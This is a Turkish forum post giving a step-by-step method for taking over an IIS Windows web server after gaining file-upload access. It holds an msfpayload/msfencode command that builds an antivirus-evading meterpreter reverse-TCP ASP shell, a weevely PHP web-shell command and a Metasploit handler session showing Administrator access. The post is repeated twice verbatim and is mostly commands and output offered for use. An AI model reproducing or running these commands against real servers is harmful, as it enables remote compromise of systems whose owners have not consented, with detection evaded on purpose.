17-06-2019, Saat: 21:58
Merhaba herkese,
Şimdi hedef web Sunucuda (IIS-windows) eğer dosya yükleme hakkı elde etmişsek , antivirüsler tarafından yakalanamayan asp shell dosyası kullanarak hedef web sunucuyu ele geçirebilme şansımız ortaya çıkabilir.
[font]msfpayload windows/meterpreter/reverse_tcp LHOST=kali-sunucu-ipsi LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp[/font]
msfpayload komutu ile antivirüsler tarafından yakalanamayan asp shell oluşturup, dosya yükleme hakkımız olan web sunucuna yükleyebiliriz.
[font]weevely http://192.168.10.100/sh.php abc123[/font]
Oluşturduğumuz php shell dosyasını web sunucusuna attıktan sonra hedef web sunucusundan shell elde etmek için tekrar weevely komutunu kullanırız.
[font]root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.23 ((Kali sunucsunun İp'si)
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: alipc\Administrator
meterpreter > sysinfo
Computer : ALIPC
OS : Windows 8 (Build 9200).
Architecture : x64 (Current Process is WOW64)
System Language : tr_TR
Meterpreter : x86/win32
meterpreter > [/font]
asp shell dosyası web sunucusuna yükledikten sonra dosya tarayıcı ile çalıştırıyoruz.
[font](http://hedef-web-sunuc-ip/sh.asp) [/font]
Dosya çalıştırıldıktan sonra Meterpreter oturumu elde edilmiş olur.
Şimdi hedef web Sunucuda (IIS-windows) eğer dosya yükleme hakkı elde etmişsek , antivirüsler tarafından yakalanamayan asp shell dosyası kullanarak hedef web sunucuyu ele geçirebilme şansımız ortaya çıkabilir.
[font]msfpayload windows/meterpreter/reverse_tcp LHOST=kali-sunucu-ipsi LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp[/font]
msfpayload komutu ile antivirüsler tarafından yakalanamayan asp shell oluşturup, dosya yükleme hakkımız olan web sunucuna yükleyebiliriz.
[font]weevely http://192.168.10.100/sh.php abc123[/font]
Oluşturduğumuz php shell dosyasını web sunucusuna attıktan sonra hedef web sunucusundan shell elde etmek için tekrar weevely komutunu kullanırız.
[font]root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.23 ((Kali sunucsunun İp'si)
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: alipc\Administrator
meterpreter > sysinfo
Computer : ALIPC
OS : Windows 8 (Build 9200).
Architecture : x64 (Current Process is WOW64)
System Language : tr_TR
Meterpreter : x86/win32
meterpreter > [/font]
asp shell dosyası web sunucusuna yükledikten sonra dosya tarayıcı ile çalıştırıyoruz.
[font](http://hedef-web-sunuc-ip/sh.asp) [/font]
Dosya çalıştırıldıktan sonra Meterpreter oturumu elde edilmiş olur.